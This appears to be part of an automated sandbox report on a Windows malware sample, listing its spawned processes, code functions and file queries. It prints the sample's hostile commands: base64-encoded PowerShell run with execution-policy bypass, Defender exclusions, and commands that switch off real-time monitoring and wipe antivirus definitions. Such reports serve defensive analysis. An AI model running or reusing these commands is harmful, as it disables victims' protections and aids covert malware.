Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagkaaqbqacmapgbbagqazaatafqaeqbwaguaiaataeeacwbzaguabqbiagwaeqboageabqblacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsapaajahiacgbwacmapgbbafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwauae0azqbzahmayqbnaguaqgbvahgaxqa6adoauwboag8adwaoaccazqbyahiabwbyadoaiablahgacablagmadablagqaiaanaccaowanaccaiabiaguazgbvahiazqagaccajwbyaguadab1ahiabganaccajwasaccajwasaccatwblaccalaanaeuacgbyag8acganackapaajaggaegb5acmapga="	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagqazabtacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahuaawbpacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajageabgbiacmapgagac0argbvahiaywblacaapaajahkabab5acmapga="	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe

Code function: 5_2_00007FF72B078880 cpuid

5_2_00007FF72B078880

Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: GetLocaleInfoW,GetNumberFormatW,	13_2_00B5D0AB
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: GetLocaleInfoW,GetNumberFormatW,	21_2_0056AF0F
Source: C:\ProgramData\svchost.exe	Code function: GetLocaleInfoW,GetNumberFormatW,	29_2_0067AF0F

Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Queries volume information: C:\Users\user\Desktop\87Bym0x4Fy.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Queries volume information: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformation	Jump to behavior
